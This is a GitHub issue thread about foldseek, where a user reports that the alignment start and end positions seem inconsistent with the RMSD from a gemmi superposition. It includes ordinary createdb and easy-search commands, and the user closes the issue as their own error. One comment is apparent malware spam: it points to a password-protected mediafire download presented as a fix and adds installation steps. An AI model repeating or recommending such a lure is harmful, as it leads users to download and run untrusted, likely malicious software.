### ISSUE TITLE
Incorrect target alignment start/end

### ISSUE THREAD

**Issue by m-crown** [steineggerlab/foldseek#342]
I am running foldseek on a custom database of assemblies from the PDB. As part of my scripts, I am using the alignment produced by foldseek to superimpose query and target structures in gemmi. The build code is as follows:

```
foldseek createdb --chain-name-mode 1 pcg_assemblies/ pcgDB
foldseek createindex pcgDB pcgDB_index
```

A particular structure shows a significantly different RMSD between my approach and the reported RMSD from foldseek (Foldseek 7.3 vs Gemmi superposition 23.207865). Normally there are some minor differences between the two that I attribute to implementation differences. However, when I examine this example with a large RMSD difference, I can see that the structure is being aligned to a completely different part of the protein than what is being reported in the output file. Foldseek reports the alignment as beginning at position 717 in the query, when in reality it is matching to an identical fold beginning around 100AA earlier. The command I am running is as follows:

```
foldseek easy-search AF-A0A023GPK8-F1-model_v4.cif pcgDB aln_pcg_A0A023GPK8 pcgDB_index --format-mode 4 --format-output query,target,u,t,qlen,tlen,alnlen,mismatch,qaln,qstart,qend,taln,tstart,tend,rmsd,qheader,alntmscore,qtmscore,ttmscore,evalue,prob
```

The output file is attached. It seems the RMSD calculation is for the alignment seen when running the same command with output mode 5:

```
foldseek easy-search AF-A0A023GPK8-F1-model_v4.cif pcgDB aln_pcg_A0A023GPK8 pcgDB_index --format-mode 5 
```

But the qstart/qend is incorrect.
[alignment_issue.zip](https://github.com/user-attachments/files/16830876/alignment_issue.zip)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by m-crown** [comment]
I think this was a mistake in my code, closing as I have resolved.
